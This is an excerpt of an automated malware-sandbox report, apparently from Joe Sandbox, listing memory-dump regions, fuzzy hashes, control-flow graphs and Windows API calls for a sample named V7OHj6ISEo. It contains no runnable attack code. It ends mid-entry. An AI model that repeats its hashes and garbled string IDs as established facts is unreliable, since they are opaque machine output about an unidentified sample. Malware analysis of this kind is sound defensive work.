                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 708ce8c985e6a5fe72d7ff78243574c10c567d97de1e08d37bf400710dddb3e7
                                                                                                            • Instruction ID: 5fb25a51fa57221e03b63d3e0b66ca1b37cd9ba74242a7e4cd908a18e4f205bd
                                                                                                            • Opcode Fuzzy Hash: 708ce8c985e6a5fe72d7ff78243574c10c567d97de1e08d37bf400710dddb3e7
                                                                                                            • Instruction Fuzzy Hash: C8D1B178E00218CFEB14DFA5C994B9DBBB2FF89301F1081A9D809AB354DB355A82CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02918f1c0609205aa385fb8b5d51676f16a4a693bf264ea2931b867f5e41f734
                                                                                                            • Instruction ID: b57636f66d9b879a96a9e611b926edd2df26f3f56fa6c48db94af1078bdc540c
                                                                                                            • Opcode Fuzzy Hash: 02918f1c0609205aa385fb8b5d51676f16a4a693bf264ea2931b867f5e41f734
                                                                                                            • Instruction Fuzzy Hash: F7C19174E00218CFDB58DFA5D994B9DBBB2AF89300F2081A9D809AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc44fec22acc49942fa3c073568a6a2be50e95dd080348ab3d00094a8167ce4d
                                                                                                            • Instruction ID: bd77ce49a85b7f83e81a640e896df26f6d31bd18a9c56c18101062b73396768c
                                                                                                            • Opcode Fuzzy Hash: fc44fec22acc49942fa3c073568a6a2be50e95dd080348ab3d00094a8167ce4d
                                                                                                            • Instruction Fuzzy Hash: 72A10474D00208CFEB14DFA5C598B9DBBB1FF89301F2082A9E409BB291DB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48af33cb762373046c8ae48d32576f2e3009e4e340bfa8d317a530fb43aecefb
                                                                                                            • Instruction ID: aa3ffc5838ae1b69e2a05892543c4cb1e643a5d5a58849bde1f1e49c4c086e60
                                                                                                            • Opcode Fuzzy Hash: 48af33cb762373046c8ae48d32576f2e3009e4e340bfa8d317a530fb43aecefb
                                                                                                            • Instruction Fuzzy Hash: C6A11574D00208CFEB10DFA5C548BDDBBB1FF89311F2082A9E409AB2A1DB755985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2563046356.00000000350C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 350C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_350c0000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: efa9ed32e5d91741d0e9114d215935a2cf0c37f8d4b464093f32cf99ddd8fcd0
                                                                                                            • Instruction ID: 52b1aa8f0e4353abd7858a0d93b6321b4251f0e256726c32b04af0bcad341db9
                                                                                                            • Opcode Fuzzy Hash: efa9ed32e5d91741d0e9114d215935a2cf0c37f8d4b464093f32cf99ddd8fcd0
                                                                                                            • Instruction Fuzzy Hash: F991F274900348CFEB10DFA8D998B9CBBB1FF49311F2082A9E409AB291DB759985CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a5057bce0d5931887625762d62bb4920fd406ea301a947fd916bba348461dc1
                                                                                                            • Instruction ID: 516dfc5411d32769fe438f3ae4eb670b71eb2782d80ee785f0c669d96aced826
                                                                                                            • Opcode Fuzzy Hash: 3a5057bce0d5931887625762d62bb4920fd406ea301a947fd916bba348461dc1
                                                                                                            • Instruction Fuzzy Hash: A781D474E00208CFEB58DFA9DA4469DFBF2BF98311F248129E854AB358DB359942CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62b3a56319484795acdbf525cfc8888d21f8a8b5f97a82cd1840c283ad2258a5
                                                                                                            • Instruction ID: ddf0b629b1b127506c191116e35fbf1b960381b0a4d2c553984ef50816733e06
                                                                                                            • Opcode Fuzzy Hash: 62b3a56319484795acdbf525cfc8888d21f8a8b5f97a82cd1840c283ad2258a5
                                                                                                            • Instruction Fuzzy Hash: F771D575D01228CFDB68DF66D9807DDFBB2BB89311F1091AAD409AB354DB349A86CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5becfe7a47135186483698c3f554861c539d990204ea105a74140d720f7acd2a
                                                                                                            • Instruction ID: dbbb66719b7e35d5195f63cbd2de04197a09e6b5bc7c0f64c27fba4a4bcfb09b
                                                                                                            • Opcode Fuzzy Hash: 5becfe7a47135186483698c3f554861c539d990204ea105a74140d720f7acd2a
                                                                                                            • Instruction Fuzzy Hash: CE610974A00319CFEB29DF64C855BADBBB2FB99300F1080A9A90A6B754DA355D82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 19ac950d3d168422f4cdbc7b3f815ac4cee851682f0f6fa9b0f4cbb2c238c052
                                                                                                            • Instruction ID: 4e383f583e0bdd4b02594e4b05294ee39ee3ec1b55b29d368a87dedb0b82d62b
                                                                                                            • Opcode Fuzzy Hash: 19ac950d3d168422f4cdbc7b3f815ac4cee851682f0f6fa9b0f4cbb2c238c052
                                                                                                            • Instruction Fuzzy Hash: A2416AB1E016188BEB58CF6BD9557C9FBF3AFC9300F14C1AAC50CA6265DB740A868F51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b823492dc86c5e39fdc039a34e12d806349515afe9c11ab8d85742384b3bce59
                                                                                                            • Instruction ID: 35c410a0fb8faccaecf6a93a9f74a392181ea183e90bc8c609cbace4ad13c583
                                                                                                            • Opcode Fuzzy Hash: b823492dc86c5e39fdc039a34e12d806349515afe9c11ab8d85742384b3bce59
                                                                                                            • Instruction Fuzzy Hash: 124158B1E016188BEB58CF6BD9457CAFAF3AFC9310F14C1AAD50CA6254DB740A868F50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 113 1566b8-1566ed 114 1566f3-156716 113->114 115 156b1c-156b20 113->115 124 1567c4-1567c8 114->124 125 15671c-156729 114->125 116 156b22-156b36 115->116 117 156b39-156b47 115->117 122 156b49-156b5e 117->122 123 156bb8-156bcd 117->123 133 156b65-156b72 122->133 134 156b60-156b63 122->134 135 156bd4-156be1 123->135 136 156bcf-156bd2 123->136 126 156810-156819 124->126 127 1567ca-1567d8 124->127 139 156738 125->139 140 15672b-156736 125->140 130 156c2f 126->130 131 15681f-156829 126->131 127->126 145 1567da-1567f5 127->145 146 156c34-156c4d 130->146 131->115 137 15682f-156838 131->137 141 156b74-156bb5 133->141 134->141 142 156be3-156c1e 135->142 136->142 143 156847-156853 137->143 144 15683a-15683f 137->144 147 15673a-15673c 139->147 140->147 185 156c25-156c2c 142->185 143->146 152 156859-15685f 143->152 144->143 170 1567f7-156801 145->170 171 156803 145->171 147->124 154 156742-1567a4 147->154 155 156865-156875 152->155 156 156b06-156b0a 152->156 197 1567a6 154->197 198 1567aa-1567c1 154->198 168 156877-156887 155->168 169 156889-15688b 155->169 156->130 160 156b10-156b16 156->160 160->115 160->137 172 15688e-156894 168->172 169->172 173 156805-156807 170->173 171->173 172->156 179 15689a-1568a9 172->179 173->126 180 156809 173->180 181 156957-156982 call 156500 * 2 179->181 182 1568af 179->182 180->126 199 156a6c-156a86 181->199 200 156988-15698c 181->200 183 1568b2-1568c3 182->183 183->146 187 1568c9-1568db 183->187 187->146 190 1568e1-1568f9 187->190 253 1568fb call 156c98 190->253 254 1568fb call 156c88 190->254 193 156901-156911 193->156 196 156917-15691a 193->196 201 156924-156927 196->201 202 15691c-156922 196->202 197->198 198->124 199->115 222 156a8c-156a90 199->222 200->156 203 156992-156996 200->203 201->130 204 15692d-156930 201->204 202->201 202->204 207 1569be-1569c4 203->207 208 156998-1569a5 203->208 209 156932-156936 204->209 210 156938-15693b 204->210 212 1569c6-1569ca 207->212 213 1569ff-156a05 207->213 225 1569b4 208->225 226 1569a7-1569b2 208->226 209->210 211 156941-156945 209->211 210->130 210->211 211->130 219 15694b-156951 211->219 212->213 214 1569cc-1569d5 212->214 216 156a07-156a0b 213->216 217 156a11-156a17 213->217 220 1569e4-1569fa 214->220 221 1569d7-1569dc 214->221 216->185 216->217 223 156a23-156a25 217->223 224 156a19-156a1d 217->224 219->181 219->183 220->156 221->220 227 156a92-156a9c call 1553a8 222->227 228 156acc-156ad0 222->228 229 156a27-156a30 223->229 230 156a5a-156a5c 223->230 224->156 224->223 231 1569b6-1569b8 225->231 226->231 227->228 242 156a9e-156ab3 227->242 228->185 234 156ad6-156ada 228->234 237 156a32-156a37 229->237 238 156a3f-156a55 229->238 230->156 232 156a62-156a69 230->232 231->156 231->207 234->185 239 156ae0-156aed 234->239 237->238 238->156 244 156afc 239->244 245 156aef-156afa 239->245 242->228 250 156ab5-156aca 242->250 247 156afe-156b00 244->247 245->247 247->156 247->185 250->115 250->228 253->193 254->193
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$(oq$(oq$(oq$(oq
                                                                                                            • API String ID: 0-4267992933
                                                                                                            • Opcode ID: 3f195d8cbc268bb86de60d104c3166872b5020ef835583985b7df8d9fc7f240d
                                                                                                            • Instruction ID: a017cb006b66d3f3afaea24d3a4e033f896972a46b0ed6675507a77e551646d8
                                                                                                            • Opcode Fuzzy Hash: 3f195d8cbc268bb86de60d104c3166872b5020ef835583985b7df8d9fc7f240d
                                                                                                            • Instruction Fuzzy Hash: 2D124830A00249CFCB24CF69D984A9EBBF2EF48315F558569E869DF261DB30ED45CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 255 37d1d548-37d1d66d 274 37d1d710-37d1d73c 255->274 275 37d1d673-37d1d6b9 255->275 279 37d1d747-37d1d75e 274->279 280 37d1d6c4-37d1d70f 275->280 281 37d1d6bb-37d1d6bf 275->281 281->280
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ($05$4'q$4'q$dr5$)-7
                                                                                                            • API String ID: 0-2181239973
                                                                                                            • Opcode ID: 688aec74a0c946f9875ef6cdf81f9b444c031568048448d4817a3a972613d104
                                                                                                            • Instruction ID: 8385c88404b961c837888297a0b11ef4f854efdd5e7285e80ed6d984beb5f62f
                                                                                                            • Opcode Fuzzy Hash: 688aec74a0c946f9875ef6cdf81f9b444c031568048448d4817a3a972613d104
                                                                                                            • Instruction Fuzzy Hash: 99517270E042099FCB05DFA8D951AEEBBB2FF89300F1485A5E005BB266DB359D41CF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 617 38240980-38240a0f GetCurrentProcess 621 38240a11-38240a17 617->621 622 38240a18-38240a4c GetCurrentThread 617->622 621->622 623 38240a55-38240a89 GetCurrentProcess 622->623 624 38240a4e-38240a54 622->624 626 38240a92-38240aaa 623->626 627 38240a8b-38240a91 623->627 624->623 638 38240aad call 38240f31 626->638 639 38240aad call 38240b4f 626->639 627->626 629 38240ab3-38240ae2 GetCurrentThreadId 631 38240ae4-38240aea 629->631 632 38240aeb-38240b4d 629->632 631->632 638->629 639->629
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 382409FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38240A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38240A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38240AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: e41ac1179cc9a2418a627702c22aced7c5a530890f910ed6edb7bb85fe292ecc
                                                                                                            • Instruction ID: b84d35623cc475794213338be3fb22696f87d79e303978e4e6e99d7b381b03d0
                                                                                                            • Opcode Fuzzy Hash: e41ac1179cc9a2418a627702c22aced7c5a530890f910ed6edb7bb85fe292ecc
                                                                                                            • Instruction Fuzzy Hash: 545165B0900709CFEB58CFA9D544BDEBBF1EB88310F208459E448AB361DB759981CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 860 37d17920-37d17941 861 37d17943 860->861 862 37d17948-37d1797e 860->862 861->862 865 37d17987-37d179ae 862->865 867 37d179b4-37d179cc 865->867 868 37d17b3d-37d17b46 865->868 871 37d17ae8-37d17b03 867->871 873 37d179d1-37d17ae7 871->873 874 37d17b09-37d17b2d 871->874 873->871 874->868
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <C5$<C5$<C5
                                                                                                            • API String ID: 0-2498843165
                                                                                                            • Opcode ID: e25a6f6c98cd52edef68fd9cdbf81770e4cbe8aef51ed5498b4a2dfd0628b1cc
                                                                                                            • Instruction ID: 22c0f6a208c000b7db48eeee627332aac8b34a299c386d3a8653274aa3a52a5d
                                                                                                            • Opcode Fuzzy Hash: e25a6f6c98cd52edef68fd9cdbf81770e4cbe8aef51ed5498b4a2dfd0628b1cc
                                                                                                            • Instruction Fuzzy Hash: AA51FF74D01318CFEB24DFA5D954BADBBB2FF89310F608129E805AB254DB759A86CF40

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1682 157458-157946 1757 15794c-15795c 1682->1757 1758 157e98-157ecd 1682->1758 1757->1758 1759 157962-157972 1757->1759 1762 157ecf-157ed4 1758->1762 1763 157ed9-157ef7 1758->1763 1759->1758 1761 157978-157988 1759->1761 1761->1758 1764 15798e-15799e 1761->1764 1765 157fbe-157fc3 1762->1765 1776 157f6e-157f7a 1763->1776 1777 157ef9-157f03 1763->1777 1764->1758 1766 1579a4-1579b4 1764->1766 1766->1758 1768 1579ba-1579ca 1766->1768 1768->1758 1769 1579d0-1579e0 1768->1769 1769->1758 1771 1579e6-1579f6 1769->1771 1771->1758 1772 1579fc-157a0c 1771->1772 1772->1758 1774 157a12-157a22 1772->1774 1774->1758 1775 157a28-157e97 1774->1775 1781 157f91-157f9d 1776->1781 1782 157f7c-157f88 1776->1782 1777->1776 1783 157f05-157f11 1777->1783 1792 157fb4-157fb6 1781->1792 1793 157f9f-157fab 1781->1793 1782->1781 1791 157f8a-157f8f 1782->1791 1788 157f36-157f39 1783->1788 1789 157f13-157f1e 1783->1789 1794 157f50-157f5c 1788->1794 1795 157f3b-157f47 1788->1795 1789->1788 1802 157f20-157f2a 1789->1802 1791->1765 1792->1765 1793->1792 1804 157fad-157fb2 1793->1804 1799 157fc4-157fe6 1794->1799 1800 157f5e-157f65 1794->1800 1795->1794 1807 157f49-157f4e 1795->1807 1808 157ff6 1799->1808 1809 157fe8 1799->1809 1800->1799 1801 157f67-157f6c 1800->1801 1801->1765 1802->1788 1813 157f2c-157f31 1802->1813 1804->1765 1807->1765 1812 157ff8-157ff9 1808->1812 1809->1808 1811 157fef-157ff4 1809->1811 1811->1812 1813->1765
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $q$$q
                                                                                                            • API String ID: 0-3126353813
                                                                                                            • Opcode ID: 97e3ff44eccea70acf426744da8e2aa5b50effe12fa1233b09c30a859132ec8b
                                                                                                            • Instruction ID: fe5c4a3f756bae8066e6627baf89ca4ebd47edd0d6dd6b045015b2eeacfb4841
                                                                                                            • Opcode Fuzzy Hash: 97e3ff44eccea70acf426744da8e2aa5b50effe12fa1233b09c30a859132ec8b
                                                                                                            • Instruction Fuzzy Hash: 1D52F134A00218CFEB68DBA4C861B9EBB72EF85301F1080ADD51A7B395DB355E86DF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q
                                                                                                            • API String ID: 0-1467158625
                                                                                                            • Opcode ID: e7dcbb3a6b801c32d67eace04b6dcfe901f2bdf6e027658a7285f90d376fae33
                                                                                                            • Instruction ID: aa1d311a70649c3d623ca864a1efbeb2440a0c69c1ebe8c1f0a991f4fef62860
                                                                                                            • Opcode Fuzzy Hash: e7dcbb3a6b801c32d67eace04b6dcfe901f2bdf6e027658a7285f90d376fae33
                                                                                                            • Instruction Fuzzy Hash: 29518F70B04205CFDB14DB69C891ABEB7B6EF88301F14846AE925EF251DB34CD498BA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2559 37d1fab0-37d1fafe 2564 37d1fb00-37d1fb13 2559->2564 2565 37d1fb15-37d1fb1d 2559->2565 2564->2565 2568 37d1fb24-37d1fb56 call 37d1ebfc 2564->2568 2565->2568 2613 37d1fb58 call 350cf4d8 2568->2613 2614 37d1fb58 call 350cf4e8 2568->2614 2575 37d1fb5e-37d1fb88 2578 37d1fba2-37d1fbdb call 37d1ec0c 2575->2578 2579 37d1fb8a-37d1fb9d 2575->2579 2589 37d1fc10-37d1fcdc call 382400c0 2578->2589 2590 37d1fbdd-37d1fbec 2578->2590 2580 37d1fdd9-37d1fddf 2579->2580 2582 37d1fde1 2580->2582 2583 37d1fde9 2580->2583 2582->2583 2585 37d1fdea 2583->2585 2585->2585 2606 37d1fce2-37d1fd3c 2589->2606 2590->2589 2593 37d1fbee-37d1fc08 2590->2593 2593->2589 2609 37d1fd47-37d1fd48 2606->2609 2610 37d1fd3e 2606->2610 2609->2580 2610->2609 2613->2575 2614->2575
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ($05$g5
                                                                                                            • API String ID: 0-4254612366
                                                                                                            • Opcode ID: a7e37150cc008ac04ce11428c5ac3a3b72fe1722594af04df552e56c7cf36c55
                                                                                                            • Instruction ID: 410450fb9f3d1568f012ae64d5d9f9235efabf6b8710252b603791c4fd707287
                                                                                                            • Opcode Fuzzy Hash: a7e37150cc008ac04ce11428c5ac3a3b72fe1722594af04df552e56c7cf36c55
                                                                                                            • Instruction Fuzzy Hash: 96710474E10219CFDB49DFB8D9586ADBBF2EF88310F10812AE806AB255DF359942CF41
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ($05$g5
                                                                                                            • API String ID: 0-4254612366
                                                                                                            • Opcode ID: 0051d424947dd04433c0a169b9222be3c5ad6112618cb923e532705237a19421
                                                                                                            • Instruction ID: 65f91149062a614c35c6add8e25c83c8e80357b96f0b7b8a22af7ceedd0f09ac
                                                                                                            • Opcode Fuzzy Hash: 0051d424947dd04433c0a169b9222be3c5ad6112618cb923e532705237a19421
                                                                                                            • Instruction Fuzzy Hash: 61314738E00308CBEB19DF79D5646ADBFF2AB88310F14852AD816AB395DF359842CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565620126.0000000037D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_37d10000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <C5$<C5
                                                                                                            • API String ID: 0-2734903954
                                                                                                            • Opcode ID: 22fda603388042c4ade2b15e9180fbd79804b5369bc73fd90dc15bea5436c330
                                                                                                            • Instruction ID: 78da07a9b36668e84e0570bb7a0e41f5080f312eed908113f90dc4cafe8046d9
                                                                                                            • Opcode Fuzzy Hash: 22fda603388042c4ade2b15e9180fbd79804b5369bc73fd90dc15bea5436c330
                                                                                                            • Instruction Fuzzy Hash: 7B21FF70D01318DEEB04CFA5E4547EEFBB2AF89310F508469D814AB254DB795A8ACF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q
                                                                                                            • API String ID: 0-1467158625
                                                                                                            • Opcode ID: 6d1784e89611c039927249bc624a9a699f2454adb8d1117f5404569654c58347
                                                                                                            • Instruction ID: b7f818011a40ba3b521171a51bc46a05953eba18a1032e995c3a362086319098
                                                                                                            • Opcode Fuzzy Hash: 6d1784e89611c039927249bc624a9a699f2454adb8d1117f5404569654c58347
                                                                                                            • Instruction Fuzzy Hash: DAF062353002146FDB181AAA9C55A7BBADBEBDC3A1B148429FD5DCB391DF71CC1147A0
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38240222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: ef2d6ec1288c745f09d8a42fc9bc096db1bf4e30dc31fc66199ea5c291f03ba9
                                                                                                            • Instruction ID: 3c32ee1b401e93d47403d745ee594f83b60c5fcb49dffb414db5886f11dd94f7
                                                                                                            • Opcode Fuzzy Hash: ef2d6ec1288c745f09d8a42fc9bc096db1bf4e30dc31fc66199ea5c291f03ba9
                                                                                                            • Instruction Fuzzy Hash: E851D3B5D00349DFDB14CFA9C884ADEBFB1BF48310F24852AE819AB250D7759981CF90
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38240222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 5a185f7437cd591e3c11084afa70d0175fa9c226ffa4837549bda632252fca1d
                                                                                                            • Instruction ID: e9e265a9ade35641adf85927c2c6d082cd273dc3643c345ff1d46241381d9acb
                                                                                                            • Opcode Fuzzy Hash: 5a185f7437cd591e3c11084afa70d0175fa9c226ffa4837549bda632252fca1d
                                                                                                            • Instruction Fuzzy Hash: 4241CFB5D10349EFDB14CFA9C880ADEBBB5BF48310F24852AE818AB250D7749981CF90
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 38241E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2565914800.0000000038240000.00000040.00000800.00020000.00000000.sdmp, Offset: 38240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_38240000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: ade7a84211364afe715795f277c7d39e57aa635a49e9a07c7a029cee1dc1e8c1
                                                                                                            • Instruction ID: a472d7e8a1d60fc6841d2071f8711a86ad27c860de823ebf8a39f676ba495106
                                                                                                            • Opcode Fuzzy Hash: ade7a84211364afe715795f277c7d39e57aa635a49e9a07c7a029cee1dc1e8c1
                                                                                                            • Instruction Fuzzy Hash: 6D4107B9A00349DFDB14CF9AC444AAAFBF5FF88310F24C459D519AB321D774A841CBA1
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38240C4F
                                                                                                            Memory Dump Source
